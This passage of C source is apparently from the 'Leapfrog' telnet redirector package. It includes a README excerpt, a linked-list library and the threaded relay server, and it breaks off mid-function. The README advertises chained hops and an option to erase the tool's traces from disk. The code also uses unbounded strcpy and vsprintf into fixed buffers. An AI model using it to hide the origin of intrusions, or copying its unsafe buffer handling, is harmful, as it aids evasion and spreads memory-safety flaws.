send to 23, then telnet to port 80 of the leapfrog machine and you will ricochet to the machine you wish to connect. You will have the Leapfrog machines' IP and MAC addresses. It supports unlimited users (well, limited by memory). Leapfrog can be chained, reconfigured on the fly, and customized to change ports/machine redirects without the need to log into the box. It can be configured (with little work) to remove all traces of itself from disk after being loaded, or it can be configured to log everything (default). It supports colors and some basic admin tools. It is very fast. Leapfrog compiles on Solaris 2.6, 2.7, x86 (2.6, 2.7), Linux with pthread libs, BSD with pthread libs. Possibly others, but it wasn't tested on others. 1.0a has been released. This corrects some spelling and format mistakes as well as corrects a few ifdef's. It also adds the gnu public license. leapfrog-1.0/ to caller Pre compare is address of compare function used whenever two nodes need to be compared. Post head has allocated or error returned Return head node pointer or null if memory overflow */ LIST *createList (int (*compare) (void *argu1, void *argu2)) { /* Local Declarations */ LIST *list; /* Statements */ list = (LIST *) malloc (sizeof (LIST)); if (list) { list->head = NULL; list->pos = NULL; list->rear = NULL; list->count = 0; list->compare = compare; } /* if */ return list; } /* createList */ /* =============== addNode ============== */ /* Inserts data into linked list. Pre pList is a pointer to a valid list dataInPtr is a pointer to data to be inserted Post data inserted unless dupe key or overflow Return -1 if overflow, 0 if successful, 1 if dupe key */ int addNode (LIST *pList, void *dataInPtr) { /* Local Declarations */ int found; int success; NODE *pPre; NODE *pLoc; /* Statements */ found = _search (pList, &pPre, &pLoc, dataInPtr); // if (found == 1) /* Duplicate keys not allowed */ // return (+1); success = _insert (pList, pPre, dataInPtr); if (!success) /* Overflow */ return (-1); return (0); } /* addNode */ /* =============== _insert ============== */ /* Inserts data pointer into a new node in the linked list. Pre pList is a pointer to a valid list pPre is a pointer to the data's predecessor dataInPtr contains data pointer to be inserted Post data have been inserted in sequence Return boolean, true if successful, false if memory overflow. */ static int _insert (LIST *pList, NODE *pPre, void *dataInPtr) { /* Local Declarations */ NODE *pNew; /* Statements */ if (!(pNew = (NODE *) malloc(sizeof(NODE)))) return 0; pNew->dataPtr = dataInPtr; pNew->link = NULL; if (pPre == NULL) { /* Adding before first node or to empty list. */ pNew->link = pList->head; pList->head = pNew; if (pList->count == 0) /* Adding to empty list. Set rear */ pList->rear = pNew; } /* if pPre */ else { /* Adding in middle or at end */ pNew->link = pPre->link; pPre->link = pNew; /* Now check for add at end of list */ if (pNew->link == NULL) pList->rear = pNew; } /* if else */ (pList->count)++; return 1; } /* _insert */ /* =============== removeNode ============== */ /* Removes data from linked list. Pre pList is a pointer to a valid list keyPtr is pointer to key to be deleted dataOutPtr is a pointer to data pointer Post Node deleted or error returned. Return false (0) if not found; true (1) if deleted */ int removeNode (LIST *pList, void *keyPtr, void **dataOutPtr) { /* Local Declarations */ int found; NODE *pPre; NODE *pLoc; /* Statements */ found = _search (pList, &pPre, &pLoc, keyPtr); if (found) _delete (pList, pPre, pLoc, dataOutPtr); return found; } /* removeNode */ /* =============== _delete ============== */ /* Deletes data from a linked list and returns pointer to data to calling module. Pre pList is a pointer to a valid list. pPre is a pointer to predecessor node pLoc is a pointer to target node dataOutPtr is pointer to data pointer Post Data have been deleted and returned Data memory has been freed */ void _delete (LIST *pList, NODE *pPre, NODE *pLoc, void **dataOutPtr) { /* Statements */ *dataOutPtr = pLoc->dataPtr; if (pPre == NULL) /* Deleting first node */ pList->head = pLoc->link; else /* Deleting any other node */ pPre->link = pLoc->link; /* Test for deleting last node */ if (pLoc->link == NULL) pList->rear = pPre; (pList->count)--; free (pLoc); return; } /* _delete */ /* =============== searchList ============== */ /* Interface to search function. Pre pList is a pointer to an initialized list. pArgu is pointer to key being sought Post pDataOut contains pointer to found data -or- NULL if not found Return boolean true if successful, false if not found. */ int searchList (LIST *pList, void *pArgu, void **pDataOut) { /* Local Declarations */ int found; NODE *pPre; NODE *pLoc; /* Statements */ found = _search (pList, &pPre, &pLoc, pArgu); if (found) *pDataOut = pLoc->dataPtr; else *pDataOut = NULL; return found; } /* searchList */ /* =============== _search ============== */ /* Searches list and passes back address of node containing target and its logical predecessor. Pre pList is a pointer to an initialized list. pPre is pointer variable to receive predecessor pLoc is pointer variable to receive node pArgu is pointer to key being sought Post pLoc points to first node equal/greater key -or- null if target > key of last node pPre points to largest node smaller than key -or- null if target < key of first node Return boolean true if successful, false if not found. */ int _search (LIST *pList, NODE **pPre, NODE **pLoc, void *pArgu) { /* Macro Definition */ #define COMPARE (((* pList->compare) (pArgu, (*pLoc)->dataPtr))) #define COMPARE_LAST ((* pList->compare) (pArgu, pList->rear->dataPtr)) /* Local Declarations */ int result; /* Statements */ *pPre = NULL; *pLoc = pList->head; if (pList->count == 0) return 0; /* Test for argument > last node in list */ if ( COMPARE_LAST > 0) { *pPre = pList->rear; *pLoc = NULL; return 0; } /* if */ while ( (result = COMPARE) > 0 ) { /* Have not found search argument location */ *pPre = *pLoc; *pLoc = (*pLoc)->link; } /* while */ if (result == 0) /* argument found--success */ return 1; else return 0; } /* _search */ /* =============== retrieveNode ============== */ /* This algorithm retrieves data in the list without changing the list contents. Pre pList is a pointer to an initialized list. pArgu is a pointer to key of data to be retrieved Post Data (pointer) passed back to caller Return boolean true if successful, false if underflow. */ static int retrieveNode (LIST *pList, void *pArgu, void **dataOutPtr) { /* Local Declarations */ int found; NODE *pPre; NODE *pLoc; /* Statements */ found = _search (pList, &pPre, &pLoc, pArgu); if (found) { *dataOutPtr = pLoc->dataPtr; return 1; } /* if */ *dataOutPtr = NULL; return 0; } /* retrieveNode */ /* =============== emptyList ============== */ /* Returns boolean indicating whether or not the list is empty Pre pList is a pointer to a valid list Return boolean true if empty, false if list has data */ int emptyList (LIST *pList) { /* Statements */ return (pList->count == 0); } /* emptyList */ /* =============== fullList ============== */ /* Returns boolean indicating no room for more data. The list is full if memory cannot be allocated for another node. Pre pList is a pointer to a valid list Return boolean true if full, false if room for another node. */ int fullList (LIST *pList) { /* Local Declarations */ NODE *temp; /* Statements */ if ((temp = (NODE *)malloc (sizeof (NODE)))) { free (temp); return 0; } /* Dynamic memory full */ return 1; } /* fullList */ /* =============== listCount =============== */ /* Returns integer representing number of nodes in list. Pre pList is a pointer to a valid list Return count for number of nodes in list */ int listCount(LIST *pList) { /* Statements */ return pList->count; } /* listCount */ /* =============== traverse ============== */ /* Traverses a linked list. Each call either starts at the beginning of list or returns the location of the element in the list that was last returned. Pre pList is a pointer to a valid list fromWhere is 0 to start at the first element dataPtrOut is address of a pointer to data Post if another element, address placed in dataPtr Return true if another element located, false if end of list */ int traverse (LIST *pList, int fromWhere, void **dataPtrOut) { /* Local Declarations */ int success; /* Statements */ if (fromWhere == 0) { /*Start from first node */ if (pList->count == 0) success = 0; else { pList->pos = pList->head; *dataPtrOut = pList->pos->dataPtr; success = 1; } /* if else */ } /* if fromwhere */ else { /* Start from current position */ if (pList->pos->link == NULL) success = 0; else { pList->pos = pList->pos->link; *dataPtrOut = pList->pos->dataPtr; success = 1; } /* if else */ } /* if fromwhere else */ return success; } /* traverse */ /* =============== destroyList ============== */ /* Deletes all data in list and recycles memory Pre List is a pointer to a valid list. Post All data and head structure have been deleted. Return null head pointer */ LIST *destroyList (LIST *pList) { /* Local Declarations */ NODE *deletePtr; /* Statements */ if (pList) { while (pList->count > 0) { /* First delete data */ free (pList->head->dataPtr); /* Now delete node */ deletePtr = pList->head; pList->head = pList->head->link; pList->count--; free (deletePtr); } free (pList); } /* if */ return NULL; } /* destroyList */ lso if you want to make a little more fucntionality, that is if you want to have functions in which the users can access while connected follow the command strcut and add the functions as done with the command_func from link.h f()() is all, Follow the all[] array and the foramt i have created, nothing tricky here. You can use the input( arg ) function (takes a struct frog *). Just follow the examples I have created in the port+1 section of the code. Get input gets keyed/data input and returns 1 on good input and -1 if the user has not hit a key within 30seconds (timeout). Linked_list taken from: Brooks/Cole Publishing Company, see linked_list.h for disclaimer To change port to bind to edit include/config.h for user configs and then run make again NOTES: if you are going through a firewall connections may need to go through opened firewall ports WISH LIST: Next version I will clean up the code, and allow the user to drop to a shell localy Also I will create a nice admin interface on the port+1 to do local things... Web Site: www.cotse.com */ /* server */ /* #define _REENTRANT */ #include "include/config.h" #include <signal.h> #include <stdio.h> #include <stdarg.h> #include <sys/types.h> #include <errno.h> #include <fcntl.h> #include <sys/stat.h> #include <malloc.h> #include <ctype.h> #include <sys/ioctl.h> #include <arpa/inet.h> #include <fcntl.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <sys/time.h> #include <arpa/telnet.h> #include <unistd.h> #include <sys/wait.h> #include <sys/un.h> #include <sys/socket.h> #include <sys/un.h> #ifdef SOLARIS #include <sys/filio.h> #endif #include <netinet/in.h> #include "include/link.h" #include "include/linked_list.h" #include "include/proto.h" #include "include/version.h" // the old redhat4 defs go back to previos redhat implentations before pthreads came standard #ifdef REDHAT4 #include </usr/include/pthread/mit/pthread.h> #endif #ifdef REDHAT5 #include <pthread.h> #endif #define IPROTO 0 #ifdef SOLARIS extern int close (int); extern int socket (int, int, int); #if !defined(LINUX) //extern int getsockopt (int, int, int, char *, int *); extern void bzero (char *, int); #endif /* LINUX */ extern int listen (int, int); #endif /* SOLARIS */ /* Local Function Prototypes */ char *first_char(char *line); void init_socket(int port); void who(struct frog *p, char *str); void send_fd(struct frog *p, char *str); void cls(struct frog *p, char *str); void close_socket(struct frog *current); void get_input(struct frog *current); void show_login(struct frog *p); void password_mode_on(struct frog *p); void password_mode_off(struct frog *p); void do_prompt(struct frog *p); void hitells(struct frog *p, char *str); void shut_down(struct frog *p, char *str); void time_logged_in(struct frog *p, int x); void init_signals(); void log_file(char *file, char *string, ...); void alive_connect(void); char *sys_time(void); int input(struct frog *p); struct terminal terms[] = { {"xterm", "\033[1m", "\033[m", "\033[H\033[2J"}, {"vt220", "\033[1m", "\033[m", "\033[H\033[J"}, {"vt100", "\033[1m", "\033[m", "50\033[;H\0332J"}, {"vt102", "\033[1m", "\033[m", "50\033["}, {"ansi", "\033[1m", "\033[0m", "50\033[;H\0332J"}, {"wyse-30", "\033G4", "\033G0", ""}, {"tvi912", "\033l", "\033m", "\032"}, {"sun", "\033[1m", "\033[m", "\014"}, {"adm", "\033)", "\033(", "1\032"}, {"hp2392", "\033&dB", "\033&d@", "\033H\033J"}, {"java","","",""}, {0, "", "", ""} }; // struct to hold any function calls made by connected, will work for admin tools struct command all[] = { {"cls",cls,0,0,0,0}, {"help",view_commands,0,0,0,0}, {"time",time_up,0,0,0,0}, {0, 0, 0, 0, 0, 0, 0} }; /* Local/global Variables */ int RAMUSED; int mainsock; pid_t pid; FILE *wt; int in_current=0; int in_pack_current=0; int out_current=0; int out_pack_current=0; int logins; int current_online; int alive_descriptor; // mutexs not used in this program, can be used though pthread_mutex_t linked_list = PTHREAD_MUTEX_INITIALIZER; void* serverWatch( void* ); void* serverClient( struct player_t *p_t); void* configWatch( void* ); void* configClient( struct player_t *p_t); // port to def listen on int main_descriptor; // port to def+1 listen on config thread int config_descriptor; // time value time_t timeval; int main ( void ) { pthread_t watcher_thr,watcher_thr2; RAMUSED=0; log_file("server","Trying to connect to port....\n"); if (VERBOSE) printf("trying to connect to port..\n"); // init the socket for use on SERVERPORT init_socket(SERVERPORT); // create thread for def port pthread_create(&watcher_thr,NULL,serverWatch,(void*)NULL); // create thread for def+1 port config thread we pass null b/c we have nothing to pass pthread_create(&watcher_thr2,NULL,configWatch,(void*)NULL); /* random number generation */ srand((unsigned int)getpid()); // Start our signal Handlers init_signals(); for (;;) { // we will sleep here for 30 minutes then will sync all files at that time // that is 1800 seconds == 30 mins sleep(1800); if (1) { // do whatever in here I write out to a log for sanity every 30mins log_file("sync.fil","Sanity\n"); } else { // ditto log_file("sync.fil","Ratts No Sanity?\n"); } } exit(0); } /* log files */ void log_file(char *file, char *string, ...) { va_list argnum; char stack[255],data[255]; int fd, length; // they dont/do want logging #if !defined(LOGGING) return; #endif va_start(argnum, string); vsprintf(data,string,argnum); va_end(argnum); sprintf(stack, "%slogs/%s.log", ROOT, file); fd = open(stack, O_CREAT | O_WRONLY | O_SYNC, S_IRUSR | S_IWUSR); length = lseek(fd, 0, SEEK_END); write(fd, data, strlen(data)); close(fd); } /* not areal lot done here just old style signal handler */ void sig_exit(int crap) { char buf[255]; if (VERBOSE) printf("Signal Caught sig_exit. Exiting Cleanly.\n"); sprintf(buf,"Signal %d caught sig_exit exiting cleanly?\n",crap); log_file("signals",buf); } void sig_segv(int crap) { char buf[255]; if (VERBOSE) printf("Segmentation Violation Caught. Exiting Cleanly\n"); sprintf(buf,"Signal %d caught exiting cleanly? Seg Violation\n",crap); log_file("signals",buf); // lets try to sync all the files now.... pthread_mutex_unlock(&linked_list); exit(crap); } void sig_kill(int crap) { char buf[255]; if (VERBOSE) printf("Signal %d caught, Kill caught, exiting cleanly?\n",crap); sprintf(buf,"Signal %d caught, Kill caught, exiting cleanly?\n",crap); log_file("signals",buf); exit(crap); return; } void sig_usr(int crap) { char buf[255]; if (VERBOSE) printf("Signal %d caught, sig usr 1 or 2 or neither, exiting cleanly?\n",crap); if ((crap==SIGUSR1)) sprintf(buf,"Signal %d caught, sig usr2, exiting cleanly?\n",crap); else if ((crap==SIGUSR2)) sprintf(buf,"Signal %d caught, sig usr2, exiting cleanly?\n",crap); else sprintf(buf,"Signal %d caught, in sig usr neither 1 or 2, exiting cleanly?\n",crap); log_file("signals",buf); exit(crap); return; } void sig_pipe(int crap) { if (VERBOSE) printf("SIGPIPE CAUGHT\n"); log_file("signals","SIGPIPE error ratts"); signal(SIGPIPE,sig_pipe); return; } void sig_term(int crap) { if (VERBOSE) printf("SIGTERM CAUGHT\n"); log_file("signals","SIGTERM error ratts"); signal(SIGTERM,sig_term); return; } void init_signals() { signal(SIGPIPE, sig_pipe); signal(SIGHUP, sig_exit); signal(SIGINT, sig_exit); signal(SIGQUIT, sig_exit); signal(SIGILL, sig_exit); signal(SIGTRAP, sig_exit); signal(SIGIOT, sig_exit); signal(SIGBUS, sig_exit); signal(SIGFPE, sig_exit); signal(SIGKILL, sig_kill); signal(SIGSEGV, sig_segv); signal(SIGALRM, sig_exit); signal(SIGTERM, sig_term); signal(SIGCHLD, sig_exit); signal(SIGCONT, sig_exit); signal(SIGSTOP, sig_exit); signal(SIGTSTP, sig_exit); signal(SIGTTIN, sig_exit); signal(SIGTTOU, sig_exit); signal(SIGURG, sig_exit); signal(SIGXCPU, sig_exit); signal(SIGXFSZ, sig_exit); signal(SIGVTALRM, sig_exit); signal(SIGPROF, sig_exit); signal(SIGWINCH, sig_exit); signal(SIGIO, sig_exit); signal(SIGPWR, sig_exit); } // initilize the main socket void init_socket(int port) { struct sockaddr_in main_socket, config_socket; int dummy = 1,dummy_2=1,config_port; char *hostname; struct hostent *hp; /* grab the main socket */ hostname=(char *)malloc(101); RAMUSED+=sizeof(hostname); bzero((char *)&main_socket, sizeof(struct sockaddr_in)); bzero((char *)&config_socket, sizeof(struct sockaddr_in)); gethostname(hostname,100); hp=gethostbyname(hostname); if ( hp == NULL) { printf("Error: Host machine does not exist!\n"); } main_socket.sin_family=hp->h_addrtype; main_socket.sin_port=htons(port); config_socket.sin_family=hp->h_addrtype; config_port=port+1; config_socket.sin_port=htons(config_port); main_descriptor = socket(AF_INET, SOCK_STREAM, IPROTO); if (main_descriptor < 0) { printf("Couldn't grab main socket!!!\n"); exit(-1); } config_descriptor = socket(AF_INET, SOCK_STREAM, IPROTO); if (config_descriptor < 0) { printf("Couldn't grab config socket!!!\n"); exit(-1); } if (setsockopt(main_descriptor, SOL_SOCKET, SO_REUSEADDR, (char *) &dummy, sizeof(dummy)) < 0) printf("Couldn't setsockopt() main\n"); if (setsockopt(config_descriptor, SOL_SOCKET, SO_REUSEADDR, (char *) &dummy_2, sizeof(dummy_2)) < 0) printf("Couldn't setsockopt() config\n"); // we do not need to set it non block but here is the code to do it att & bsd /* flags=fcntl(main_descriptor,F_GETFL,0); fcntl(main_descriptor,F_SETFL,O_NONBLOCK|flags); if (ioctl(main_descriptor, FIONBIO, &dummy) < 0) printf("Can't set non-blocking\n"); */ if (bind(main_descriptor, (struct sockaddr *) & main_socket, sizeof(main_socket)) < 0) { if (VERBOSE) printf("Couldn't bind main socket!!! ... check if something is already listening on that port!\n"); log_file("server","Couldn't bind main socket!!! ... check if something is alreadyn listening on that port!\n"); exit(-2); } if (bind(config_descriptor, (struct sockaddr *) & config_socket, sizeof(config_socket)) < 0) { if (VERBOSE) printf("Couldn't bind config socket!!! ... check if something is already listening on that port!\n"); log_file("server","Couldn't bind config socket!!! ... check if something is alreadyn listening on that port!\n"); exit(-2); } if (listen(main_descriptor, 5) < 0) printf("Listen refused main\n"); if (listen(config_descriptor, 5) < 0) printf("Listen refused config\n"); pid=getpid(); (void)time(&timeval); if (VERBOSE) { printf ("\n\nServer %s's main socket is set to receive on port - %d pid =%d\n", hostname,port,(int)pid); printf("starting date and time %s \n",ctime(&timeval)); printf("\n\nServer Config socket is set to receive on port %d\n",port+1); } log_file("server","\n\nServer %s's main socket is set to receive on port - %d pid =%d\n", hostname,port,pid); log_file("server","\n\nServer Config is set to receive on port %d\n",port+1); log_file("server","starting date and time : %s \n",ctime(&timeval)); } // config descriptor thread void* configWatch(void* dummy) { pthread_t dummy_thr; int accepted_socket; int test,size; struct sockaddr_in accept_addr; struct player_t *passed_t; struct hostent *addy; fd_set read_set; int ready_fd; test=0; // loop forever for (;;) { /* wait for client to connect up */ // dont forget to zero out the set and reset what we are looking for every time we go into the loop FD_ZERO(&read_set); FD_SET(config_descriptor, &read_set); // listen on the main socket and wait for someone to connect // bc we are threaded block, non block is not important do { ready_fd= select(FD_SETSIZE, &read_set, NULL,NULL,NULL); } while (ready_fd<=0 || !FD_ISSET(config_descriptor, &read_set)); /* client has now connected */ /* pass a thread data structure to the thread instead of just the fd */ passed_t=(struct player_t *)malloc(sizeof(players_t)); RAMUSED+=sizeof(passed_t); size = sizeof(accept_addr); accepted_socket = accept(config_descriptor, (struct sockaddr*)&accept_addr, &size); passed_t->socket=accepted_socket; strcpy(passed_t->sin_addr,inet_ntoa(accept_addr.sin_addr)); addy=(void *)0; addy = gethostbyaddr((char *) &(accept_addr.sin_addr.s_addr), sizeof(accept_addr.sin_addr.s_addr), AF_INET); if (addy) passed_t->numerical_address = strdup(addy->h_name); else passed_t->numerical_address = passed_t->sin_addr; /* your pid */ passed_t->pid=getpid(); /* create a new thread and pass the thread data structure we created to it..nice way to encapsulate data */ // we dont care about thread syncing per-se that is why we are not keeping track in any conventional manner pthread_create(&dummy_thr, NULL, (void *) configClient, (struct player *) passed_t); } } // main descriptor thread void* serverWatch(void* dummy) { pthread_t dummy_thr; int accepted_socket; int test,size; struct sockaddr_in accept_addr; struct player_t *passed_t; struct hostent *addy; fd_set read_set; int ready_fd; test=0; // loop forever for (;;) { /* wait for client to connect up */ // dont forget to zero out the set and reset what we are looking for every time we go into the loop FD_ZERO(&read_set); FD_SET( main_descriptor, &read_set); // listen on the main socket and wait for someone to connect // bc we are threaded block, non block is not important do { ready_fd= select(FD_SETSIZE, &read_set, NULL,NULL,NULL); } while (ready_fd<=0 || !FD_ISSET(main_descriptor, &read_set)); /* client has now connected */ /* pass a thread data structure to the thread instead of just the fd */ passed_t=(struct player_t *)malloc(sizeof(players_t)); RAMUSED+=sizeof(passed_t); size = sizeof(accept_addr); accepted_socket = accept(main_descriptor, (struct sockaddr*)&accept_addr, &size); passed_t->socket=accepted_socket; strcpy(passed_t->sin_addr,inet_ntoa(accept_addr.sin_addr)); addy=(void *)0; addy = gethostbyaddr((char *) &(accept_addr.sin_addr.s_addr), sizeof(accept_addr.sin_addr.s_addr), AF_INET); if (addy) passed_t->numerical_address = strdup(addy->h_name); else passed_t->numerical_address = passed_t->sin_addr; /* your pid */ passed_t->pid=getpid(); /* create a new thread and pass the thread data structure we created to it..nice way to encapsulate data */ // we dont care about thread syncing per-se that is why we are not keeping track in any conventional manner pthread_create(&dummy_thr, NULL, (void *) serverClient, (struct player *) passed_t); } } /* config client to the socket for configuration issues */ void* configClient(struct player_t *p_t) { int dummy = 1; struct frog *p; time_t time_now; char hostname[101]; char host_name[20]; int y,x; int run_command; logins++; /* set non blocking of io */ if (ioctl(p_t->socket, FIONBIO, &dummy) < 0) printf("Can't set non-blocking\n"); gethostname(hostname,100); x=0; while(x<strlen(hostname) && (hostname[x]!='.')) host_name[x]=hostname[x++]; x=0; p=(struct frog*)malloc(sizeof(FROG)); p->stack=(char *)malloc(200*sizeof(char)); p->totell=(char *)malloc(200*sizeof(char)); /* zero them out now */ memset(p, 0, sizeof(p)); p->flags=0; /* get ip# and hostname if they have one */ strcpy(p->num_addr,p_t->sin_addr); strncpy(p->inetaddr, p_t->numerical_address, 50 - 2); (void *)p->socket=(void *)p_t->socket; p->term=1; p->oldstack=p->stack; /* log every connection */ (void)time(&time_now); log_file("config_logins","server name:%s inet addr:%s - %s",p->name,p->inetaddr,ctime(&time_now)); send_fd(p,"\n\n\t\t\t\tWelcome To ^GLeap Frog^N:\n"); send_fd(p,"\n\n\t\t^Gwww.cotse.com^N (^GC^Nhurch ^GO^Nf"); send_fd(p," ^GT^Nhe ^GS^Nwimming ^GE^Nlephant)\n\n"); send_fd(p,"\tNOTE: You have connected to the configuration utility\n"); send_fd(p,"\tThe New configuration (if it can be resolved) will be cached\n"); send_fd(p,"\tIf this is the first time you are connecting (resolved queries) will be cached\n"); send_fd(p,"\nPlease enter Server and port (default is 23) Followed by a carriage return\n"); send_fd(p,"Help is Available: type -> help\n"); send_fd(p,"Example foo.bar.com 4365\n\n"); run_command=0; p->flags=0; while(run_command>-1) { send_fd(p,"Type In server and port to ^GLeap Frog^N To\n> "); if(!(input(p))) { free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } if (p->flags & PANIC) { free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } x=0; while(x<strlen(p->buffer) && p->buffer[x]!=' ') p->name[x]=p->buffer[x++]; p->name[x]='\0'; if (!strcasecmp(p->name,"quit")) { free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } // here is where you can check for commands a function would be better, but i will do it here for now run_command=do_match(p,p->buffer,all); if (run_command>-1) execute_command(p, all, " ", run_command); p->flags=0; } y=0; while (x<strlen(p->buffer) && p->buffer[x]==' ') x++; while(x<strlen(p->buffer) && p->buffer[x]!=' ') p->port[y++]=p->buffer[x++]; p->port[y]='\0'; p->remote_port=atoi(p->port); if (p->remote_port==0) p->remote_port=23; SENDFD(p,"ok trying %s %d\nPlease Wait connecting\n",p->name,p->remote_port); // now lets do the connection to the desired location // we cannot let them log back into us p->temp_long=inet_addr(p->name); if (!(p->host_entry = gethostbyname(p->name)) && !(p->host_entry = gethostbyaddr((char *)&p->temp_long, 4, AF_INET))) { if (p->name) SENDFD(p,"The address %s you have given could not be resolved\n",p->name); else send_fd(p,"Could not resolve that address\n"); (void)time(&time_now); log_file("failed_connect","addr:%s could not connect to %s - %s",p->inetaddr,(p->name ? p->name : "NO NAME"),ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } p->host_entry_add=gethostbyaddr((char *)&p->temp_long, 4, AF_INET); if (p->name) { if (!strcasecmp((char *)p->name, hostname) || !strcasecmp((char *)p->name,host_name) || !strcasecmp((char *)p->name,"localhost")) { SENDFD(p,"Sorry But you cannot connect back to me!\n"); (void)time(&time_now); log_file("reconnect","server name:%s inet addr:%s attempted to reconnect to us - %s",p->name,p->inetaddr,ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } } else if (!strcasecmp((char *)p->host_entry_add,p->inetaddr)) { SENDFD(p,"Sorry But you cannot connect back to me!\n"); (void)time(&time_now); log_file("reconnect","server name:%s inet addr:%s attempted to reconnect to us - %s",p->name,p->inetaddr,ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } (void)time(&time_now); log_file("login_attempt","server name:%s is attempting to connect to %s on port %d - %s",p->inetaddr,p->name,p->remote_port,ctime(&time_now)); if ((p->remote_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { SENDFD(p,"Ratts Could not get socket()\n"); (void)time(&time_now); log_file("socket","Could not get socket - %s",ctime(&time_now)); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } p->remote_addr.sin_family = p->host_entry->h_addrtype; p->remote_addr.sin_port = htons(p->remote_port); memcpy(&p->remote_addr.sin_addr, p->host_entry->h_addr, p->host_entry->h_length); p->address.sin_family=AF_INET; p->address.sin_port=p->remote_port; p->address.sin_addr=*(struct in_addr *)*p->host_entry->h_addr_list; if (connect(p->remote_sock, (struct sockaddr *)&p->remote_addr, sizeof(p->remote_addr))) { SENDFD(p,"Could not connect to %s on port %d\n",p->name,p->remote_port); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } (void)time(&time_now); // close this fd close(p->remote_sock); SENDFD(p,"Got A good connection to %s on port %d\n",p->name,p->remote_port); if(read_modify_write(p)) { send_fd(p,"Cached Data\n"); send_fd(p,"To get to the ^GLeap Frog^N\n"); SENDFD(p,"Type: ^Rtelnet %s %d^N\n",hostname,SERVERPORT); } else send_fd(p,"Sorry could not update/add cache\n"); free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; } int input(struct frog *p) { double idle_out; time_t time_now; fd_set my_set; // select static struct timeval timeout; // select call int my_fd; // select p->count=0; p->idle=time((time_t *)0); p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N); while (!(p->flags & LAST_CHAR_WAS_N)) { do { FD_ZERO(&my_set); FD_SET( p->socket, &my_set); timeout.tv_sec=(long)0; timeout.tv_usec=(long)3; // this seems like enough time my_fd= select(FD_SETSIZE, &my_set, NULL,NULL,&timeout); if ((idle_out=difftime(time((time_t *)0),p->idle))>30) // 30 secs before you idle out { (void)time(&time_now); log_file("idle_out","server name:%s inet addr:%s idled out - %s",p->name,p->inetaddr,ctime(&time_now)); send_fd(p,"Sorry But you are not going to suck up a line on me 30sec idleout\n"); p->flags|=PANIC; p->booted=1; return -1; } } while (my_fd<=0 || !FD_ISSET(p->socket, &my_set)); // stuf is wating now get it get_input(p); } // just to tiddy up p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N); p->count=0; return 1; } /* serve the client on the spec socket from thread call */ void* serverClient( struct player_t *p_t) { int count; struct frog *p; time_t time_now; char buf[4096]; fd_set my_set; // select static struct timeval timeout; // select call int my_fd; // select double idle_out; int x,y; int dummy = 1; char hostname[101]; char host_name[20]; char stack[255]; int found=0; logins++; gethostname(hostname,100); x=0; while(x<strlen(hostname) && (hostname[x]!='.')) host_name[x]=hostname[x++]; x=0; /* set non blocking of io */ if (ioctl(p_t->socket, FIONBIO, &dummy) < 0) printf("Can't set non-blocking\n"); count=1; p=(struct frog*)malloc(sizeof(FROG)); p->stack=(char *)malloc(200*sizeof(char)); p->totell=(char *)malloc(200*sizeof(char)); /* zero them out now */ memset(p, 0, sizeof(p)); p->flags=0; /* get ip# and hostname if they have one */ strcpy(p->num_addr,p_t->sin_addr); strncpy(p->inetaddr, p_t->numerical_address, 50 - 2); (void *)p->socket=(void *)p_t->socket; p->term=1; p->oldstack=p->stack; /* log every connection */ (void)time(&time_now); log_file("logins","server name:%s inet addr:%s - %s",p->name,p->inetaddr,ctime(&time_now)); // lets see if they have connected to us before sprintf(stack,"%s/files/%s",ROOT,USERS_ADDRESS_FILE); if (read_in(p)) { found=1; p->flags &= ~ _VERBOSE; } else { found=0; p->flags |=_VERBOSE; } // my intro message if (p->flags & _VERBOSE) { SENDFD(p,"\t\t\t\tWelcome to ^GLeap Frog^N\n\n"); send_fd(p,"\n\n\t\t^Gwww.cotse.com^N (^GC^Nhurch ^GO^Nf"); send_fd(p," ^GT^Nhe ^GS^Nwimming ^GE^Nlephant)\n\n"); } if (p->flags & _VERBOSE) send_fd(p,"Enter Location and port (default is 23) to telnet to followed by enter.\nExample: foo.bar.com 8976\n> "); // read data from session opened p->count=0; p->idle=time((time_t *)0); p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N); if (!found) { while (!(p->flags & LAST_CHAR_WAS_N)) { do { FD_ZERO(&my_set); FD_SET( p->socket, &my_set); timeout.tv_sec=(long)0; timeout.tv_usec=(long)3; // this seems like enough time my_fd= select(FD_SETSIZE, &my_set, NULL,NULL,&timeout); if ((idle_out=difftime(time((time_t *)0),p->idle))>30) // 30 secs before you idle out { (void)time(&time_now); log_file("idle_out","server name:%s inet addr:%s idled out - %s",p->name,p->inetaddr,ctime(&time_now)); send_fd(p,"Sorry But you are not going to suck up a line on me 30sec idleout\n"); p->flags|=PANIC; p->booted=1; free(p->stack); free(p->totell); free(p); close(p_t->socket); pthread_exit(NULL); return 0; break; } } while (my_fd<=0 || !FD_ISSET(p->socket, &my_set)); // ok now get the input from the fd get_input(p); } // just to tiddy up p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N); p->count=0; // get the host/port now x=0; while(x<strlen(p->buffer) && p->buffer[x]!=' ') p->name[x]=p->buffer[x++]; p->name[x]='\0'; y=0; while (x<strlen(p->buffer) && p->buffer[x]==' ') x++; while(x<strlen(p->buffer) && p->buffer[x]!=' ') p->port[y++]=p->buffer[x++]; p->port[y]='\0'; p->remote_port=atoi(p->port); if (p->remote_port==0) p->remote_port=23; } // end of not found // now lets resolve the desired address // we cannot let them log back into us p->temp_long=inet_addr(p->name); if (!(p->host_entry = gethostbyname(p->name)) && !(p->host_entry = gethostbyaddr((char *)&p->temp_long, 4, AF_INET))) { if (p->name) SENDFD(p,"The address %s you have given could not be resolved\n",p->name); else 